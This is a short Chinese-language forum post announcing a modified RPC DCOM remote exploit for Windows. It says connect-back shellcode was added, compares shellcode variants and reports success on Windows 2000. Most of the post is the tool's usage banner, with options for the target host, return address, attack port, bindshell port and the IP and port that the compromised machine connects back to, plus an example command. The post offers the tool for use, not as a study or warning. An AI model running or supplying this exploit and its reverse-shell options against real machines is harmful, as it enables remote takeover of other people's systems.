改了packstorm上发布的这个, 加了connect back的shellcode.<br> 开始用的是eyas的,但是他的会把rpcss搞死. 所以最后用了一个lion修改版.<br> 这个还是比较厉害的.XP下未测试,2000测试成功.<br> <br> dcom -d 127.0.0.1 0<br> <br> <br> DcomRPC.exe 通用攻击程序<br> <br> RPC DCOM exploit coded by .:[oc192.us]:. Security<br> modified by bkbll (bkbll@cnhonker.net) 2003/08/07<br> Usage:<br> <br> dcom -d <host> [options]<br> Options:<br> -d: Hostname to attack [Required]<br> -t: Type [Default: 0]<br> -r: Return address [Default: Selected from target]<br> -p: Attack port [Default: 135]<br> -l: Bindshell port [Default: 666]<br> -h: the IP connect back to.<br> -P: the port connect back to.<br> Connect back using eyass shellcode<br>
|